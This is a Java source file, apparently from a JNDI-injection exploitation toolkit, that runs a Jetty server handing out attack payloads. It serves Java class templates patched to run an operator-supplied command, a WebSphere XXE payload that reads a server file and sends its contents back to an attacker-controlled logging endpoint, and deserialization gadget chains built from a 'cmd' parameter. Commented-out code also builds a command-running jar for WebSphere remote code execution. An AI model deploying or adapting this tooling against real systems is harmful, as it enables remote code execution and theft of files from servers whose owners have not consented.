package jetty;

import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import jndi.CommonDeserial;
import org.apache.commons.codec.binary.Hex;
import org.apache.commons.lang3.reflect.FieldUtils;
import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.servlet.ServletHandler;
import util.ExportObject;

import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.net.URL;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.jar.JarOutputStream;
import java.util.zip.ZipEntry;

import static org.apache.commons.lang3.StringEscapeUtils.escapeJava;
import static run.ServerStart.getLocalTime;
import static util.Transformers.insertCommand;

/**
 * @Classname JettyServer
 * @Description HTTPServer supply .class file which execute command by Runtime.getRuntime.exec()
 */
public class JettyServer implements Runnable{
    private int port;
    private Server server;
    private static URL codebase;
    private static String command;
    byte[] exportByteCode;
    byte[] exportJar;

//    public JettyServer(int port) {
//        this.port = port;
//        server = new Server(port);
//        command = "open /Applications/Calculator.app";
//    }

    public JettyServer(int port, URL cb, String cmd) throws Exception {
        this.port = port;
        server = new Server(port);
        codebase = cb;
        command = cmd;

//        exportByteCode = patchBytecode(ExportObject.class, command, "xExportObject");
//        exportJar = createJar(exportByteCode, "xExportObject");
    }

    @Override
    public void run() {
        ServletHandler handler = new ServletHandler();
        server.setHandler(handler);

        handler.addServletWithMapping(DownloadServlet.class, "/*");
        handler.addServletWithMapping(WsdlServlet.class, "/wsdl/*");
        handler.addServletWithMapping(DeserialServlet.class, "/deserial/*");
        try {
            server.start();
            server.join();
        }catch (Exception e){
            e.printStackTrace();
        }

    }

    /**
     * Patch the bytecode of supplied class constructor by injecting execution of a command
     */
//    byte[] patchBytecode(Class clazz, String command, String newName) throws Exception {
//
//        //load ExploitObject.class bytecode
//        ClassPool classPool = ClassPool.getDefault();
//        CtClass exploitClass = classPool.get(clazz.getName());
//
//        //patch its bytecode by adding a new command
//        CtConstructor m = exploitClass.getConstructors()[0];
//        m.insertBefore("{ Runtime.getRuntime().exec(\"" +  escapeJava(command) + "\"); }");
//        exploitClass.setName(newName);
//        exploitClass.detach();
//        return exploitClass.toBytecode();
//    }

    /**
     * Create an executable jar based on supplied bytecode
     */
//    byte[] createJar(byte[] exportByteCode, String className) throws Exception {
//
//        ByteArrayOutputStream bout = new ByteArrayOutputStream();
//        JarOutputStream jarOut = new JarOutputStream(bout);
//        jarOut.putNextEntry(new ZipEntry(className + ".class"));
//        jarOut.write(exportByteCode);
//        jarOut.closeEntry();
//        jarOut.close();
//        bout.close();
//
//        return bout.toByteArray();
//    }

    @SuppressWarnings("serial")
    public static class DownloadServlet extends HttpServlet {
        public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{

            String filename = request.getRequestURI().substring(1);
            InputStream in = checkFilename(filename);
            byte[] transformed;
            ByteArrayInputStream bain = null;

            if (in != null) {
                try {
                    transformed = insertCommand(in,command);
                    bain = new ByteArrayInputStream(transformed);

                }catch (Exception e){
                    e.printStackTrace();
                    System.out.println(getLocalTime() + " [JETTYSERVER]>> Byte array build failed.");
                }

                System.out.println(getLocalTime() + " [JETTYSERVER]>> Log a request to " + request.getRequestURL());
                response.setStatus(HttpServletResponse.SC_OK);
                response.setHeader("content-disposition", "attachment;filename="+URLEncoder.encode(filename, "UTF-8"));

                int len ;
                byte[] buffer = new byte[1024];
                OutputStream out = response.getOutputStream();
                if (bain != null){
                    while ((len = bain.read(buffer)) > 0) {
                        out.write(buffer,0,len);
                    }
                    bain.close();
                }else {
                    System.out.println(getLocalTime() + " [JETTYSERVER]>> Read file error!");
                }
            }else {
                System.out.println(getLocalTime() + " [JETTYSERVER]>> URL("+ request.getRequestURL() +") Not Exist!");
            }
        }

        public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
            doGet(request, response);
        }
    }

    @SuppressWarnings("wsdl")
    public static class WsdlServlet extends HttpServlet {

        public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
//            System.out.println("wsdl");
            String subpath = request.getRequestURI().substring(6);
            OutputStream out = response.getOutputStream();
            switch (subpath) {
                case "list.wsdl":
                    System.out.println(getLocalTime() + " [WebSphere XXE] attach list.wsdl");
                    String listWsdl = "" +
                            "<!DOCTYPE x [\n" +
                            "  <!ENTITY % aaa SYSTEM \"file://" + command + "\">\n" +
                            "  <!ENTITY % bbb SYSTEM \"" + codebase + "wsdl/xx.dtd\">\n" +
                            "  %bbb;\n" +
                            "]>\n" +
                            "<definitions name=\"HelloService\" xmlns=\"http://schemas.xmlsoap.org/wsdl/\">\n" +
                            "  &ddd;\n" +
                            "</definitions>";
                    response.setStatus(HttpServletResponse.SC_OK);
                    out.write(listWsdl.getBytes());

                    break;
                case "xx.dtd":
                    System.out.println(getLocalTime() + " [WebSphere XXE] attach xx.dtd");
                    String xxhttp = "<!ENTITY % ccc '<!ENTITY ddd &#39;<import namespace=\"uri\" location=\"" +
                            codebase + "wsdl/xxeLog?%aaa;\"/>&#39;>'>%ccc;";
                    response.setStatus(HttpServletResponse.SC_OK);
                    out.write(xxhttp.getBytes());

                    break;
                case "xxeLog":
                    //xxe logger for websphere wsdl payloads
                    System.out.println(getLocalTime() + " [WebSphere XXE] attack result: " + request.getQueryString());
                    response.setStatus(HttpServletResponse.SC_OK);

                    break;
//                case "/xExportObject.jar":
//                    //send xExportObject bytecode in a jar archive
//                    //payload for WebSphere RCE
//                    response.setStatus(HttpServletResponse.SC_OK);
//                    out.write(exportJar);
//                    System.out.println("Stalling connection for 60 seconds");
//                    try {
//                        Thread.sleep(60000);
//                    } catch (InterruptedException e) {
//                        e.printStackTrace();
//                    }
//                    System.out.println("Release stalling...");
//                    break;
//
//                case "/upload.wsdl":
//                    //payload for WebSphere RCE
//                    //intended to upload xExploitObject.jar into the /temp directory on server
//                    String uploadWsdl = "<!DOCTYPE a SYSTEM \"jar:" + codebase +
//                            "xExploitObject.jar!/file.txt\"><a></a>";
//                    response.setStatus(HttpServletResponse.SC_OK);
//                    out.write(uploadWsdl.getBytes());
//                    break;
                default:
                    response.setStatus(HttpServletResponse.SC_OK);
                    break;
            }

        }

        public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
            doGet(request, response);
        }
    }

    private static InputStream checkFilename(String filename){
        String template;
        switch (filename){
            case "ExecTemplateJDK6.class":
                template = "template/ExecTemplateJDK6.class";
                break;
            case "ExecTemplateJDK7.class":
                template = "template/ExecTemplateJDK7.class";
                break;
            case "ExecTemplateJDK8.class":
                template = "template/ExecTemplateJDK8.class";
                break;
            default:
                return null;
        }
        return Thread.currentThread().getContextClassLoader().getResourceAsStream(template);

    }

    @SuppressWarnings("deserial")
    public static class DeserialServlet extends HttpServlet {

        public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{

        }

        public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
            // System.out.println("deserial");
            String wrapper = null;
            String output = "base64";
            String payloadGadget = request.getRequestURI().substring(10);
            String cmdParam = request.getParameter("cmd");
            if (cmdParam == null){
                response.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR);
                OutputStream out = response.getOutputStream();
                out.write("No param: cmd".getBytes());
                return;
            }
            String wrapperParam = request.getParameter("wrapper");
            if (wrapperParam != null && wrapperParam.length()>0){
                wrapper = wrapperParam;
            }
            String outputParam = request.getParameter("output");
            if (outputParam != null && outputParam.length()>0){
                output = outputParam;
            }
            CommonDeserial commonDeserial = new CommonDeserial(cmdParam);
            byte[] deserialBytes = new byte[0];
            try {
                deserialBytes = commonDeserial.execByDeserialize(payloadGadget, wrapper, false);
            } catch (Exception e) {
                e.printStackTrace();
            }
            if (deserialBytes.length == 0) {
                response.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR);
                OutputStream out = response.getOutputStream();
                out.write("Error in Deserialization, Please use the correct payload name.".getBytes());
                return;
            }
            if (output.equals("base64")){
                response.setStatus(HttpServletResponse.SC_OK);
                OutputStream out = response.getOutputStream();
                out.write(Base64.getEncoder().encodeToString(deserialBytes).getBytes());
            }
            else if (output.equals("hex")){
                response.setStatus(HttpServletResponse.SC_OK);
                OutputStream out = response.getOutputStream();
                out.write(Hex.encodeHexString(deserialBytes).getBytes());
            }
            else{
                response.setStatus(HttpServletResponse.SC_INTERNAL_SERVER_ERROR);
                OutputStream out = response.getOutputStream();
                out.write("Error in param -O, you can only select base64 / hex".getBytes());
            }
        }
    }

}
